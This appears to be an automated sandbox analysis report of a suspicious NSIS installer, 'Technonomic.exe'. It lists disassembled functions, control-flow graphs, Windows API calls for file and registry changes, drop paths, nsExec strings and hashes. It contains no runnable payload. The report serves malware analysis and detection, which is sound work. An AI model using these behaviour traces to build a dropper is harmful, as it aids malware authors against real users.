                                                                                                                                                                      • GetFileAttributesW.KERNEL32(: Completed), ref: 00403AEB
                                                                                                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\magmaet\clenched), ref: 00403B34
                                                                                                                                                                        • Part of subcall function 004060CA: wsprintfW.USER32 ref: 004060D7
                                                                                                                                                                      • RegisterClassW.USER32(00429200), ref: 00403B71
                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B89
                                                                                                                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403BBE
                                                                                                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403BF4
                                                                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,00429200), ref: 00403C20
                                                                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,00429200), ref: 00403C2D
                                                                                                                                                                      • RegisterClassW.USER32(00429200), ref: 00403C36
                                                                                                                                                                      • DialogBoxParamW.USER32(?,00000000,00403D6F,00000000), ref: 00403C55
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\Technonomic.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\magmaet\clenched$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                      • API String ID: 1975747703-2317402454
                                                                                                                                                                      • Opcode ID: ad5632daeb9ffc2eb022d86f5b9fa885925c4b3de087c127450ada2267c15868
                                                                                                                                                                      • Instruction ID: 56c0b88d72ef28cc24ab3b3da6b812fbe5e4610ed82a7e8ff487d4c0aa16eca4
                                                                                                                                                                      • Opcode Fuzzy Hash: ad5632daeb9ffc2eb022d86f5b9fa885925c4b3de087c127450ada2267c15868
                                                                                                                                                                      • Instruction Fuzzy Hash: E261C270240600BAD720AF66AD45F2B3A7CEB84B09F40447EF945B22E2DB7D69118A3D

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 363 402e41-402e8f GetTickCount GetModuleFileNameW call 405d58 366 402e91-402e96 363->366 367 402e9b-402ec9 call 406183 call 405b83 call 406183 GetFileSize 363->367 368 4030e0-4030e4 366->368 375 402fb9-402fc7 call 402d9f 367->375 376 402ecf-402ee6 367->376 383 403098-40309d 375->383 384 402fcd-402fd0 375->384 378 402ee8 376->378 379 402eea-402ef7 call 403358 376->379 378->379 385 403054-40305c call 402d9f 379->385 386 402efd-402f03 379->386 383->368 387 402fd2-402fea call 40336e call 403358 384->387 388 402ffc-403048 GlobalAlloc call 406678 call 405d87 CreateFileW 384->388 385->383 389 402f83-402f87 386->389 390 402f05-402f1d call 405d13 386->390 387->383 411 402ff0-402ff6 387->411 414 40304a-40304f 388->414 415 40305e-40308e call 40336e call 4030e7 388->415 394 402f90-402f96 389->394 395 402f89-402f8f call 402d9f 389->395 390->394 409 402f1f-402f26 390->409 402 402f98-402fa6 call 40660a 394->402 403 402fa9-402fb3 394->403 395->394 402->403 403->375 403->376 409->394 413 402f28-402f2f 409->413 411->383 411->388 413->394 416 402f31-402f38 413->416 414->368 422 403093-403096 415->422 416->394 418 402f3a-402f41 416->418 418->394 420 402f43-402f63 418->420 420->383 423 402f69-402f6d 420->423 422->383 424 40309f-4030b0 422->424 425 402f75-402f7d 423->425 426 402f6f-402f73 423->426 427 4030b2 424->427 428 4030b8-4030bd 424->428 425->394 429 402f7f-402f81 425->429 426->375 426->425 427->428 430 4030be-4030c4 428->430 429->394 430->430 431 4030c6-4030de call 405d13 430->431 431->368
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00402E55
                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Technonomic.exe,00000400), ref: 00402E71
                                                                                                                                                                        • Part of subcall function 00405D58: GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\Technonomic.exe,80000000,00000003), ref: 00405D5C
                                                                                                                                                                        • Part of subcall function 00405D58: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D7E
                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Technonomic.exe,C:\Users\user\Desktop\Technonomic.exe,80000000,00000003), ref: 00402EBA
                                                                                                                                                                      • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403001
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\Technonomic.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Technonomic.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                      • API String ID: 2803837635-317350955
                                                                                                                                                                      • Opcode ID: 1be99897c4a46a5915ab510cfd1f8eff2a8e5667c51a4e1e053d1b6638955747
                                                                                                                                                                      • Instruction ID: 78d4ac72044dd1d4b64dcf5cb9e774c3474f7f20f7d9c099438d2fbc404b67ba
                                                                                                                                                                      • Opcode Fuzzy Hash: 1be99897c4a46a5915ab510cfd1f8eff2a8e5667c51a4e1e053d1b6638955747
                                                                                                                                                                      • Instruction Fuzzy Hash: 6961E231900215AFDB209F75DD49B9E7AB8AB04359F20817FFA00B62C1CBB99A458B5D

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 560 401767-40178c call 402bbf call 405bae 565 401796-4017a8 call 406183 call 405b37 lstrcatW 560->565 566 40178e-401794 call 406183 560->566 571 4017ad-4017ae call 406417 565->571 566->571 575 4017b3-4017b7 571->575 576 4017b9-4017c3 call 4064c6 575->576 577 4017ea-4017ed 575->577 584 4017d5-4017e7 576->584 585 4017c5-4017d3 CompareFileTime 576->585 579 4017f5-401811 call 405d58 577->579 580 4017ef-4017f0 call 405d33 577->580 587 401813-401816 579->587 588 401885-4018ae call 4052e2 call 4030e7 579->588 580->579 584->577 585->584 589 401867-401871 call 4052e2 587->589 590 401818-401856 call 406183 * 2 call 4061a5 call 406183 call 4058c8 587->590 602 4018b0-4018b4 588->602 603 4018b6-4018c2 SetFileTime 588->603 600 40187a-401880 589->600 590->575 623 40185c-40185d 590->623 604 402a55 600->604 602->603 606 4018c8-4018d3 CloseHandle 602->606 603->606 607 402a57-402a5b 604->607 609 4018d9-4018dc 606->609 610 402a4c-402a4f 606->610 612 4018f1-4018f4 call 4061a5 609->612 613 4018de-4018ef call 4061a5 lstrcatW 609->613 610->604 617 4018f9-40228d call 4058c8 612->617 613->617 617->607 617->610 623->600 625 40185f-401860 623->625 625->589
                                                                                                                                                                      APIs
                                                                                                                                                                      • lstrcatW.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable,?,?,00000031), ref: 004017A8
                                                                                                                                                                      • CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable,?,?,00000031), ref: 004017CD
                                                                                                                                                                        • Part of subcall function 00406183: lstrcpynW.KERNEL32(0040A230,0040A230,00000400,00403466,00429260,NSIS Error), ref: 00406190
                                                                                                                                                                        • Part of subcall function 004052E2: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
                                                                                                                                                                        • Part of subcall function 004052E2: lstrlenW.KERNEL32(00402E19,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
                                                                                                                                                                        • Part of subcall function 004052E2: lstrcatW.KERNEL32(Completed,00402E19,00402E19,Completed,00000000,00000000,00000000), ref: 0040533D
                                                                                                                                                                        • Part of subcall function 004052E2: SetWindowTextW.USER32(Completed,Completed), ref: 0040534F
                                                                                                                                                                        • Part of subcall function 004052E2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
                                                                                                                                                                        • Part of subcall function 004052E2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
                                                                                                                                                                        • Part of subcall function 004052E2: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsa27B0.tmp\nsExec.dll$C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable$ExecToStack$artikulationer\Udsorteringerne
                                                                                                                                                                      • API String ID: 1941528284-3521173550
                                                                                                                                                                      • Opcode ID: 024041f0cf3f6ab180763ea1ae22c75af16c428f23fa9b29c0d9da4ba2c35ac7
                                                                                                                                                                      • Instruction ID: 6fe11ac43b73c0a2a9a7664c997375d2890861868a1009608a3dd96d2534e176
                                                                                                                                                                      • Opcode Fuzzy Hash: 024041f0cf3f6ab180763ea1ae22c75af16c428f23fa9b29c0d9da4ba2c35ac7
                                                                                                                                                                      • Instruction Fuzzy Hash: B141B531900515BFCF10BBB5CC46DAE7679EF05328B20823BF422B51E1DB3C86529A6E

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 626 4052e2-4052f7 627 4052fd-40530e 626->627 628 4053ae-4053b2 626->628 629 405310-405314 call 4061a5 627->629 630 405319-405325 lstrlenW 627->630 629->630 632 405342-405346 630->632 633 405327-405337 lstrlenW 630->633 635 405355-405359 632->635 636 405348-40534f SetWindowTextW 632->636 633->628 634 405339-40533d lstrcatW 633->634 634->632 637 40535b-40539d SendMessageW * 3 635->637 638 40539f-4053a1 635->638 636->635 637->638 638->628 639 4053a3-4053a6 638->639 639->628
                                                                                                                                                                      APIs
                                                                                                                                                                      • lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
                                                                                                                                                                      • lstrlenW.KERNEL32(00402E19,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
                                                                                                                                                                      • lstrcatW.KERNEL32(Completed,00402E19,00402E19,Completed,00000000,00000000,00000000), ref: 0040533D
                                                                                                                                                                      • SetWindowTextW.USER32(Completed,Completed), ref: 0040534F
                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
                                                                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
                                                                                                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                      • String ID: Completed
                                                                                                                                                                      • API String ID: 2531174081-3087654605
                                                                                                                                                                      • Opcode ID: 249834775a828849fb4d2b6e85db5a2f2ebd467982b82e73c19976ad16bb4df1
                                                                                                                                                                      • Instruction ID: 5ed309c8d3f1bf46da027166848d039c97de4a2eecd53fde705ce25c05ecf2d8
                                                                                                                                                                      • Opcode Fuzzy Hash: 249834775a828849fb4d2b6e85db5a2f2ebd467982b82e73c19976ad16bb4df1
                                                                                                                                                                      • Instruction Fuzzy Hash: 4A21B075900618BBCB119FA5DD44ACFBFB8EF84390F10803AF904B62A0C7B94A51DF68

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 640 4057b1-4057fc CreateDirectoryW 641 405802-40580f GetLastError 640->641 642 4057fe-405800 640->642 643 405829-40582b 641->643 644 405811-405825 SetFileSecurityW 641->644 642->643 644->642 645 405827 GetLastError 644->645 645->643
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\), ref: 004057F4
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00405808
                                                                                                                                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040581D
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00405827
                                                                                                                                                                      Strings
                                                                                                                                                                      • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004057D8
                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004057D7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                                                                                                                                                      • API String ID: 3449924974-3821307424
                                                                                                                                                                      • Opcode ID: 7075ef3404a36deb5860a48c063ce1528caeb3231ff3312c7ad9e757cbb6b53e
                                                                                                                                                                      • Instruction ID: 9d8b3aa145bda6eaeb46bbd44b0caf250caa68881350f4f3315e0aaa1c0c1a31
                                                                                                                                                                      • Opcode Fuzzy Hash: 7075ef3404a36deb5860a48c063ce1528caeb3231ff3312c7ad9e757cbb6b53e
                                                                                                                                                                      • Instruction Fuzzy Hash: 400108B1D00619EADF10DBA0D9087EFBFB8EF04314F00803AD945B6190D77996588FA9

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 646 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 653 4023c7-4023cf 646->653 654 402a4c-402a5b 646->654 655 4023d1-4023de call 402bbf lstrlenW 653->655 656 4023e2-4023e5 653->656 655->656 660 4023f5-4023f8 656->660 661 4023e7-4023f4 call 402ba2 656->661 664 402409-40241d RegSetValueExW 660->664 665 4023fa-402404 call 4030e7 660->665 661->660 667 402422-4024fc RegCloseKey 664->667 668 40241f 664->668 665->664 667->654 668->667
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                                                                                      • lstrlenW.KERNEL32(artikulationer\Udsorteringerne,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                                                                                      • RegSetValueExW.ADVAPI32(?,?,?,?,artikulationer\Udsorteringerne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,artikulationer\Udsorteringerne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseCreateValuelstrlen
                                                                                                                                                                      • String ID: artikulationer\Udsorteringerne
                                                                                                                                                                      • API String ID: 1356686001-2681483848
                                                                                                                                                                      • Opcode ID: 6e5ea9d93eb3cb9a957931279c0ba2d85e54e050eb0ba23687cbe03c42da21f9
                                                                                                                                                                      • Instruction ID: 75ab489ca3c386883e02df54fe3069bb457763bdb47647990c5a7a2e11d383c6
                                                                                                                                                                      • Opcode Fuzzy Hash: 6e5ea9d93eb3cb9a957931279c0ba2d85e54e050eb0ba23687cbe03c42da21f9
                                                                                                                                                                      • Instruction Fuzzy Hash: B8118E71A00108BFEB10AFA5DE89EAE777DEB44358F11403AF904B71D1D6B85E409668

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 671 402bff-402c28 RegOpenKeyExW 672 402c93-402c97 671->672 673 402c2a-402c35 671->673 674 402c50-402c60 RegEnumKeyW 673->674 675 402c62-402c74 RegCloseKey call 406559 674->675 676 402c37-402c3a 674->676 683 402c76-402c85 675->683 684 402c9a-402ca0 675->684 678 402c87-402c8a RegCloseKey 676->678 679 402c3c-402c4e call 402bff 676->679 681 402c90-402c92 678->681 679->674 679->675 681->672 683->672 684->681 686 402ca2-402cb0 RegDeleteKeyW 684->686 686->681 688 402cb2 686->688 688->672
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402C20
                                                                                                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
